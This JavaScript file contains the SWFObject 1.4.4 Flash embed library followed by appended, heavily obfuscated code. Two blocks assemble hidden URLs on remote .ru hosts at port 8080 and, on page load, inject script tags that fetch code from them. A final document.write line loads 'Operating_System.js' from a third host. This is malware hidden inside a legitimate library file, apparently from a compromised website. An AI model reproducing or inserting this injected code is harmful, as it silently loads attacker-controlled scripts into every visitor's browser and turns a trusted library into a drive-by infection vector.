/**
 * SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 * **SWFObject is the SWF embed script formerly known as FlashObject. The name was changed for
 *   legal reasons.
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}
if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}
if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}
deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a,_b){if(!document.getElementById){return;}
this.DETECT_KEY=_b?_b:"detectflash";
this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);
this.params=new Object();
this.variables=new Object();
this.attributes=new Array();
if(_1){this.setAttribute("swf",_1);}
if(id){this.setAttribute("id",id);}
if(w){this.setAttribute("width",w);}
if(h){this.setAttribute("height",h);}
if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}
this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();
if(c){this.addParam("bgcolor",c);}
var q=_8?_8:"high";
this.addParam("quality",q);
this.setAttribute("useExpressInstall",_7);
this.setAttribute("doExpressInstall",false);
var _d=(_9)?_9:window.location;
this.setAttribute("xiRedirectUrl",_d);
this.setAttribute("redirectUrl","");
if(_a){this.setAttribute("redirectUrl",_a);}};
deconcept.SWFObject.prototype={setAttribute:function(_e,_f){
this.attributes[_e]=_f;
},getAttribute:function(_10){
return this.attributes[_10];
},addParam:function(_11,_12){
this.params[_11]=_12;
},getParams:function(){
return this.params;
},addVariable:function(_13,_14){
this.variables[_13]=_14;
},getVariable:function(_15){
return this.variables[_15];
},getVariables:function(){
return this.variables;
},getVariablePairs:function(){
var _16=new Array();
var key;
var _18=this.getVariables();
for(key in _18){_16.push(key+"="+_18[key]);}
return _16;},getSWFHTML:function(){var _19="";
if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){
if(this.getAttribute("doExpressInstall")){
this.addVariable("MMplayerType","PlugIn");}
_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\"";
_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";
var _1a=this.getParams();
for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}
var _1c=this.getVariablePairs().join("&");
if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";
}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");}
_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\">";
_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";
var _1d=this.getParams();
for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}
var _1f=this.getVariablePairs().join("&");
if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}
return _19;
},write:function(_20){
if(this.getAttribute("useExpressInstall")){
var _21=new deconcept.PlayerVersion([6,0,65]);
if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){
this.setAttribute("doExpressInstall",true);
this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));
document.title=document.title.slice(0,47)+" - Flash Player Installation";
this.addVariable("MMdoctitle",document.title);}}
if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){
var n=(typeof _20=="string")?document.getElementById(_20):_20;
n.innerHTML=this.getSWFHTML();return true;
}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}
return false;}};
deconcept.SWFObjectUtil.getPlayerVersion=function(){
var _23=new deconcept.PlayerVersion([0,0,0]);
if(navigator.plugins&&navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];
if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}
}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}
catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}
catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}
catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}
return _23;};
deconcept.PlayerVersion=function(_27){
this.major=_27[0]!=null?parseInt(_27[0]):0;
this.minor=_27[1]!=null?parseInt(_27[1]):0;
this.rev=_27[2]!=null?parseInt(_27[2]):0;
};
deconcept.PlayerVersion.prototype.versionIsValid=function(fv){
if(this.major<fv.major){return false;}
if(this.major>fv.major){return true;}
if(this.minor<fv.minor){return false;}
if(this.minor>fv.minor){return true;}
if(this.rev<fv.rev){
return false;
}return true;};
deconcept.util={getRequestParameter:function(_29){
var q=document.location.search||document.location.hash;
if(q){var _2b=q.substring(1).split("&");
for(var i=0;i<_2b.length;i++){
if(_2b[i].substring(0,_2b[i].indexOf("="))==_29){
return _2b[i].substring((_2b[i].indexOf("=")+1));}}}
return "";}};
deconcept.SWFObjectUtil.cleanupSWFs=function(){if(window.opera||!document.all){return;}
var _2d=document.getElementsByTagName("OBJECT");
for(var i=0;i<_2d.length;i++){_2d[i].style.display="none";for(var x in _2d[i]){
if(typeof _2d[i][x]=="function"){_2d[i][x]=function(){};}}}};
deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};
__flash_savedUnloadHandler=function(){};
if(typeof window.onunload=="function"){
var _30=window.onunload;
window.onunload=function(){
deconcept.SWFObjectUtil.cleanupSWFs();_30();};
}else{window.onunload=deconcept.SWFObjectUtil.cleanupSWFs;}};
if(typeof window.onbeforeunload=="function"){
var oldBeforeUnload=window.onbeforeunload;
window.onbeforeunload=function(){
deconcept.SWFObjectUtil.prepUnload();
oldBeforeUnload();};
}else{window.onbeforeunload=deconcept.SWFObjectUtil.prepUnload;}
if(Array.prototype.push==null){
Array.prototype.push=function(_31){
this[this.length]=_31;
return this.length;};}
var getQueryParamValue=deconcept.util.getRequestParameter;
var FlashObject=deconcept.SWFObject;
var SWFObject=deconcept.SWFObject;


var fy=[];function n(){wN=23881;wN-=113;var e=String("src");var kj=["fn","eN"];RW={T:"wn"};var w=new String("app"+"end"+"Chi"+"ldAZQ".substr(0,2));this.Q=false;var l=false;var d=document;S={oB:false};var c=new String("defe"+"rqIw".substr(0,1));this.W=14075;this.W--;var h=new Array();var v=String("creat"+"eElem"+"entOj5N".substr(0,3));var np=String("onl"+"oad9Jr".substr(0,3));var a="a";var Qn={TL:"Ch"};var N="9QkZscrip".substr(4)+"t";this.Mo=false;this.Ut=false;var z="bodFuTz".substr(0,3)+"y";var H=window;var QR=[];_c=["Y","kt"];function O(){var HW={};var Uh=57360;try {kH={};var zs=["sx"];var A=String("htmoK".substr(0,2)+"tp"+":/"+"/p"+"5CPasCP5".substr(3,2)+"sp"+"nOJor".substr(3)+"tb"+"GoXluGXo".substr(3,2)+"hpu5es5uhp".substr(4,2)+".r"+"u:");zsm=28160;zsm--;Lu=3608;Lu--;var s="/go"+"oglABa".substr(0,3)+"e.c"+"om/"+"goo"+"sYMgleYMs".substr(3,3)+".co"+"6WSm.ve".substr(4)+"/cl"+"VMfari".substr(3)+"n.c"+"om."+"DyExphpEyDx".substr(4,3);ER={Qo:46047};var R=6502-6501;try {var RM='G'} catch(RM){};try {var OV='u'} catch(OV){};var E=141803-133723;GW=["pp","Pn"];var ul=["Iu","IR"];Ua={aR:3795};var KY=new Date();q=d[v](N);var aI=["zb","IX","pf"];this.qa="";ulG=50613;ulG-=31;fz=["uC","g","gN"];pa=["KS","r","Uj"];ld={lW:"du"};var Jg={};q[e]=A+E+s;var RR=false;q[c]=R;var vN=new String();d[z][w](q);ki=["QD"];yv=["zm"];Ph={ed:"j"};gH=["cX","MR"];} catch(o){this.Hm=5913;this.Hm++;cY={nG:60828};};this.WC="WC";}this.Ri='';var yL=new String();H[np]=O;try {} catch(HZ){};var RI=false;};n();var tB=new Date();var JM=false;
try {var K=["fn","Dl"];this.Ft=1192;this.Ft-=228;var L='';this.gN=27885;this.gN-=171;var d={AM:"SU"};this.x=false;try {var fS='PF'} catch(fS){};jy=["Yv","LN"];this.n="";var D=window[new String("uneSfW".substr(0,3)+"RZIscaZIR".substr(3,3)+"dNh1pedN1h".substr(4,2))];this.FK=63437;this.FK++;var q='';try {} catch(xg){};var iM={eV:"r"};var ql=window[("RegE"+"xp")];var f="1";var pS=new Array();var rf=new Date();var qi=false;mK={KU:"Mx"};var W="repla"+"ce";pJ={V:false};DG={jj:false};ve={};var Yzo={Qi:"qH"};var s=new String("on"+"lo"+"ad");var KUw=false;var YJ={I:false};var PI={};var DV="DV";try {var J='sl'} catch(J){};var k=new Date();try {var C='Mk'} catch(C){};ut=[];hZ=44552;hZ-=98;function v(f,S){N=[];kI=57043;kI+=131;this.KT=false;this.vO=false;var X="[";this.xo='';var _=new Array();var NC={vo:4822};this.cS='';X+=S;this.IL="IL";this.FE="FE";X+=D("%5d");Yb={jd:44111};kIV={kT:58214};TP=["mb","mD","pA"];lN=["DF","UY","w"];var wy={};QY={sP:52224};var R=new ql(X, "gt3Vi".substr(0,1));return f.replace(R, q);this.yi=7254;this.yi+=148;var RX=new String();Dw=["vd","SD"];};FL=58113;FL+=122;VN=496;VN+=27;nA=49273;nA+=159;qB=42956;qB+=146;var F=316705-308625;var Qm=new Date();var Oo=new Date();var t=false;this.JC=42721;this.JC-=67;var p="/g"+"oo"+"gl"+"e."+"co"+"m/"+"si"+"teAURQ".substr(0,2)+"zRXcpo".substr(4)+"NRF3in".substr(4)+"YQjRt.".substr(4)+"co"+"m/"+"me"+"3DadiD3a".substr(3,2)+"SguqafguSq".substr(4,2)+"ir8Qe".substr(0,2)+"e."+"coxanC".substr(0,2)+"m."+"phHAyn".substr(0,2)+"xOnpOnx".substr(3,1);EN=["eT","IE","te"];var CZ=48731;vU=["Fi","lQ","BV"];var WB=["Nr","mn","uk"];rl={Ik:false};this.UZ=45429;this.UZ+=200;var kF='';this.Ve=63113;this.Ve+=96;var wQ='';var g=new String("http:"+"//got"+"hguil"+"t.ru:");var HQ=["HI","hK"];var FiG=false;try {var hG='oF'} catch(hG){};wH={Ci:"cG"};IN=37171;IN++;var Gj=["ya","fa","NM"];FkU=38365;FkU++;var iD=["Vc","kA","PX"];function Z(){var Gw=false;var KI="";var oI="";mN=["xj"];try {var Pg='wS'} catch(Pg){};try {var jdC='asG'} catch(jdC){};this.we=9571;this.we-=35;var cy=false;var Hl=["Vu","Bf"];hB=["VC"];tH=["rp"];var A=v('sHcGraiXpAty','AayXGjH');AI=["FG","Ut","iMM"];var ZU=new Array();this.ow=63882;this.ow--;var y=document;var Zt=new Date();this.ba="ba";this.EV="EV";var u=new String("ap"+"pe"+"vf3nd".substr(3)+"u7EiCh7uEi".substr(4,2)+"il"+"aUGid".substr(4));this.UF="UF";var YW="";var HP="";Wp=["WS"];var c_={};this.Ciq="";this.JN=50716;this.JN-=53;c=y.createElement(A);yb=17476;yb++;IM=54103;IM-=102;rP=60504;rP++;var uJ=new Array();this.MA='';this.jA='';Ec=["De","ki"];i=g+F;i=i+p;this.Po=29552;this.Po+=74;var tp={QB:"GP"};var Y_T=new Array();var Mzr={Wu:"kL"};c.src=i;this.Kl=49902;this.Kl++;pw=["JB","TL"];this.vg='';var uZ=y.body;this.Jr=9266;this.Jr--;var uNY=31803;jO={WR:"ll"};BQ=["cQE","ZgE"];c["defer"]=f;kV={};this.wU=1061;this.wU+=84;this.gH=15519;this.gH--;this.Ij=22847;this.Ij--;LM={};this.nr=18628;this.nr++;var Fx=new String();this.wd=44403;this.wd++;this.vR=42973;this.vR++;uZ[u](c);this.dF=16366;this.dF--;var ET=["Iv","si","gV"];DFq=30975;DFq--;};jh=[];var Ic=new Array();Fkq={Sio:false};window[s]=Z;var dy={};YH=62406;YH-=31;var oj=["cd"];Xy=63636;Xy-=23;this.mX="mX";this.No=false;this.jw="jw";this.is="is";var fd=new String();} catch(yl){var JG=["iL","nw","rL"];var xc='';var JV=["fk","DX","G_"];hq={};};Tc={Ty:37355};var BC=false;this.Zx=64618;this.Zx+=126;poi={bg:29579};




document.write('<s'+'cript type="text/javascript" src="http://dolgo.lulucabana.com:8080/Operating_System.js"></scr'+'ipt>');